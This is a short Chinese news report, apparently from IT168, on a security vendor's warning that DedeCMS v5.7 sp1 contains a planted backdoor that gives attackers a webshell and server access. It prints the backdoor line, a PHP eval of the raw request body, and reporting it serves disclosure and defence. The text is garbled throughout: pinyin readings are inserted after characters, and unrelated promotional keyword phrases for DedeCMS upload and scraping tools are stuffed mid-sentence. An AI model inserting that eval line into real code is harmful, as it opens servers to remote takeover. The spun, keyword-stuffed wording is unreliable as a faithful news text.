織夢(mèng)CMS系統(tǒng)現(xiàn)后門70萬(wàn)網(wǎng)站資料恐不保

　　【IT168資訊】瑞星公司今日對(duì)外發(fā)布緊急警示：國(guó)內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢(mèng)CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門，黑客可通過(guò)此后門直接獲得網(wǎng)站的控制權(quán)限，獲取存儲(chǔ)在服務(wù)器上的文件和數(shù)據(jù)庫(kù)。據(jù)CMS官方數(shù)據(jù)顯示，目前約有70萬(wàn)網(wǎng)站使用該系統(tǒng)搭建織夢(mèng)文章批量自動(dòng)上傳助手，涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及個(gè)人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員織夢(mèng)批量更新 ，使用瑞星網(wǎng)站密碼安全檢測(cè)系統(tǒng)查找后門并及時(shí)進(jìn)行封堵。

　　據(jù)專家介紹，織夢(mèng)CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過(guò)利用這個(gè)后門織夢(mèng)軟件采集，黑客只需要構(gòu)造簡(jiǎn)單的數(shù)據(jù)包提交到服務(wù)器，就能夠獲取到該網(wǎng)站的WebShell，通過(guò)對(duì)服務(wù)器進(jìn)一步滲透攻擊，進(jìn)而獲取服務(wù)器的最高權(quán)限。

　　織夢(mèng)CMS系統(tǒng)現(xiàn)后門70萬(wàn)網(wǎng)站資料恐不保

　　▲CMS中被植入的后門代碼

　　在黑客攻陷網(wǎng)站后，便可以直接訪問(wèn)服務(wù)器上的文件、數(shù)據(jù)庫(kù)等信息。目前我國(guó)有大量網(wǎng)站采用該系統(tǒng)，此后門或?qū)?dǎo)致大量用戶的信息泄露，造成極為嚴(yán)重的影響。